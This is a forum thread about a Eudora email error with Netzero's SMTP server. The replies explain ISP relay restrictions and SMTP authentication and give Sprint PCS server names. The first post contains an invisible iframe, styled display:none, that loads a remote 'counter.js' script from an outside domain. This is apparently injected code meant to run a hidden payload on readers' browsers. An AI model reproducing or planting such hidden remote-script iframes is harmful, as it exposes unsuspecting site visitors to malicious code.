+ Reply to Thread

Thread: Eudora Email

Eudora Email

Just downloaded it and I can't get it to work with Netzero. When I try to send out mail using my smtp server for Netzero (smtp.netzero.net) I get:

An address has error: sorry, that domain isn't allowed in my list of allowed rcpthosts (#5.7.1)

What's this about??<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
    No, danger is my MIDDLE name

most ISPs only allow mail to originate from their own network. this is how they attempt to control spam. when you dial netzero, you are given an IP address on their domain, and they permit you to use their SMTP server to send mail. When you connect via Sprint PCS, you are outside their network and therefore they do not allow you to send mail. I guess you have 2 choices, I think Sprint runs an SMTP that you can use (check the archives), or try to dial a netzero access number on your phone in order to get access to the internet. They you should be able to send mail with netzeros SMTP server. There are other ways SMTP can control access, some make you access the POP3 server first and then use your authentication info from the POP3 session and some SMTP servers make you authenticate, just like a POP3 server does. Eudora will handlle authentication for an SMTP server. HTH.
    Carl

Administrator

Arrow

sprint servers are:

smtp.sprintpcs.com

pop3.sprintpcs.com

Thanks for picking me up Marc. Since I don't use them, I wouldn't know.
    Carl

Administrator

Arrow

i got 'cha back my friend...

hell, i dont use them myself... :o